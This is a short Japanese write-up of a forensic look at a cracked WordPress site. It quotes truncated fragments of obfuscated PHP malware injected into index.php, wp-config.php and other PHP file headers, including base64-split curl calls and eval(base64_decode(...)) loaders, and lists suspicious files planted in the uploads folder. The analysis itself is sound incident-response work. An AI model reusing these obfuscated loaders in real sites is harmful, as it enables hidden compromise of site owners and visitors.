ページが開けない、というので、調べてみたら、クラックされたwordpressだったので、いろいろファイルをのぞいてみた記録
ざらっと調べてみたけど、被害範囲がでかすぎたので、最初から作ってもらうしかないです、という回答となりました。
・index.php に下記のような文字列が埋め込まれていた
1 | $GLOBALS['_502176623_']=Array(base64_decode('ZXJyb3Jf' .'cm' .'V' .'wb3' .'J0aW5' .'n'),base64_decode('cHJlZ' .'19tYXRj' .'aA=' .'='),base64_decode('cHJlZ19' .'y' .'Z' .'XBsYW' .'Nl'),base64_decode('c3' .'RycG9' .'z'),base64_decode('' .'bWQ1'),base64_decode('ZnVuY' .'3Rp' .'b25fZXhpc3Rz'),base64_decode('Y3' .'Vy' .'bF9pbml' .'0'),base64_decode('Y' .'3Vyb' .'F9zZ' .'XRvcH' .'Q='),base64_decode('Y' .'3Vyb' .'F9zZXRv' .'cHQ='),base64_decode('Y' .'3V' .'yb' .'F9zZX' .'R' .'vcHQ' |
3 | +50)){echo $_8;}}elseif(@$GLOBALS['_502176623_'][13](_1644837808(1091))== round(0+0.25+0.25+0.25+0.25)){echo@$GLOBALS['_502176623_'][14]($_6);}} |
・wp-config.php 下記のようなものが数箇所に埋め込まれていた
1 | eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGF1YnRvcSA9IDE2MDU7IGZ1bmN0aW9uIHh1Y3dxbXIoJHRidmRoLCAka29pbW5nbHcpeyRuanpuZXhxcSA9ICcnOyB |
3 | neCc9PidDJywgJ3onPT4nMCcpOwpldmFsLypkeXNwZiovKHh1Y3dxbXIoJGp5Z3h0c2IsICRxemlmeGY |
・wp-content/uploads/ にいろんなものがアップロードされている
1 | [root@host wp-content]# ls -la uploads/ |
3 | drwxr-xr-x 5 apache apache 4096 12月 3 11:45 2016 . |
4 | drwxr-xr-x 7 apache apache 4096 11月 7 12:50 2016 .. |
5 | -rw-r--r-- 1 apache apache 0 5月 2 09:41 2016 1.php |
6 | drwxr-xr-x 4 apache apache 4096 10月 10 22:31 2016 2015 |
7 | drwxr-xr-x 12 apache apache 4096 10月 1 01:17 2016 2016 |
8 | -rw-r--r-- 1 apache apache 21377 5月 2 09:41 2016 dbc.php.suspected |
9 | -rw-r--r-- 1 apache apache 1367 11月 7 12:50 2016 jpgjsk.php.suspected |
10 | -rw-r--r-- 1 apache apache 4902 5月 2 09:41 2016 mates.php.suspected |
11 | drwxr-xr-x 2 apache apache 4096 12月 13 23:58 2016 ps_auto_sitemap |
12 | [root@host wp-content]# |
・wp-admin/.bt と wp-admin/css/.bt というファイルが作成され、おそらくアクセス許可IPが記載されている
ファイル末尾に追記されるわけではなく、ソートされた順序で増えていっていた
・いろんなphpの冒頭が下記のように書き換えられている
7 | $h00d = 846;$GLOBALS['a287']=Array();globa |
9 | $a287['h6d2'][65]]);}exit();} ?><?php |
・あと、データベースにいろいろデータが突っ込まれていた